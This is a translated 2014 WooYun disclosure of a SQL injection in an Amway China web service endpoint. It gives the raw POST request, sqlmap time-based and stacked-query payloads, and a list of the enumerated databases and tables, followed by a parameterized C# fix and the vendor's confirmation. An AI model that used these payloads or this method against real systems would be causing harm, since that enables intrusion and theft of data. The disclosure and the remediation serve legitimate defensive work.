
Vulnerability summary (followers: 24)

Defect ID: wooyun-2014-052388

Title: SQL injection on the Amway (China) official website

Affected vendor: amway.com.cn

Author: m_vptr

Submitted: 2014-03-07 16:19

Fixed: 2014-04-21 16:20

Published: 2014-04-21 16:20

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: confirmed by vendor

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-03-07: Details sent to the vendor; awaiting vendor response
2014-03-11: Vendor confirmed; details disclosed to the vendor only
2014-03-21: Details disclosed to core white hats and domain experts
2014-03-31: Details disclosed to regular white hats
2014-04-10: Details disclosed to trainee white hats
2014-04-21: Details disclosed to the public

Brief description:

SQL injection

Detailed description:

The WebService endpoint http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClick has a POST-based SQL injection vulnerability.

POST /amwayplaza/AmwayServices.asmx/PvAddClick HTTP/1.1
Host: www.amway.com.cn
Proxy-Connection: keep-alive
Content-Length: 26
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.amway.com.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClick
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: arp_scroll_position=0
Token=1&Title=2&Category=3

sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Place: POST
Parameter: Token
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Token=1'; WAITFOR DELAY '0:0:5'--&Title=2&Category=3
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Token=1' WAITFOR DELAY '0:0:5'--&Title=2&Category=3
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012

Proof of vulnerability:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Token
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Token=1'; WAITFOR DELAY '0:0:5'--&Title=2&Category=3
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Token=1' WAITFOR DELAY '0:0:5'--&Title=2&Category=3
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
available databases [16]:
[*] Amway
[*] amway_main
[*] AmwayProduct
[*] AmwaySearch
[*] dbIBOXMS_Amway
[*] dbIBOXMS_Main
[*] dbIBOXMS_Main_in
[*] IBOX_AmwayPlaza
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WebCrawl
[*] WebCrawlACTI

Database: Amway
[12 tables]
+------------------+
| FA_Product |
| FA_Product_amway |
| FA_Product_aynex |
| dtproperties |
| tbAdmin |
| tbClick |
| tbRoom |
| tbRoomProduct |
| tbVisit |
| tbVisitReport |
| tbqallary |
| tbqallaryImg |
+------------------+

Very time-consuming, so I did not test further.

Fix:

You know how.

Copyright notice: when reposting, please credit the source m_vptr@乌云 (WooYun)
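The report shows the Token parameter of the PvAddClick web method accepting stacked queries and a time-based payload, which means the value is being spliced into SQL text on the server. Since the fix section leaves the remedy implicit, the following added example (not the site's own code, which is not public) shows the injectable pattern next to the corrected form using SqlCommand parameters in an ASMX-style method. The table tbClick appears on the page; the column names, the connection-string name "Amway" and the service namespace are assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.Services;

// Added example: a minimal ASMX-style web method modelled on the PvAddClick
// endpoint named in the report. The real implementation is not public; the
// table tbClick is listed on the page, but the column names are assumed.
[WebService(Namespace = "http://example.invalid/")]
public class ClickService : WebService
{
    // Connection-string name is an assumption for this example.
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["Amway"].ConnectionString;

    // Vulnerable pattern: the Token value is concatenated into the statement
    // text, so quotes, a semicolon and a comment marker in the value become
    // SQL syntax. This is what lets a stacked WAITFOR DELAY run.
    [WebMethod]
    public void PvAddClick_Vulnerable(string Token, string Title, string Category)
    {
        string sql = "INSERT INTO tbClick (Token, Title, Category) VALUES ('"
                   + Token + "', '" + Title + "', '" + Category + "')";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            cmd.ExecuteNonQuery();
        }
    }

    // Fixed pattern: the statement text is constant and every caller-supplied
    // value travels as a typed, length-bounded parameter. The database receives
    // the value as data, never as part of the statement, so neither stacked
    // queries nor the time-based payload can alter what executes.
    [WebMethod]
    public void PvAddClick(string Token, string Title, string Category)
    {
        const string sql =
            "INSERT INTO tbClick (Token, Title, Category) VALUES (@Token, @Title, @Category)";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@Token", SqlDbType.NVarChar, 64).Value = Token ?? string.Empty;
            cmd.Parameters.Add("@Title", SqlDbType.NVarChar, 200).Value = Title ?? string.Empty;
            cmd.Parameters.Add("@Category", SqlDbType.NVarChar, 50).Value = Category ?? string.Empty;
            conn.Open();
            cmd.ExecuteNonQuery();
        }
    }
}
```

Parameterization closes the injection itself; the second point the report supports is privilege. The proof section enumerates 16 databases from this one endpoint, including master, msdb and the Reporting Services databases, which indicates the application login can see far more than the tbClick table it writes to. Running the site under a login scoped to the one database it needs, with only the INSERT/SELECT rights those methods require, limits what any future injection could reach.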


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 4

Confirmed: 2014-03-11 11:50

Vendor reply:

The vulnerability has been confirmed and fixed; thanks to the white hat for reporting it.

Latest status:

2014-04-21: The vulnerability has been fixed; thanks to the white hat for their support.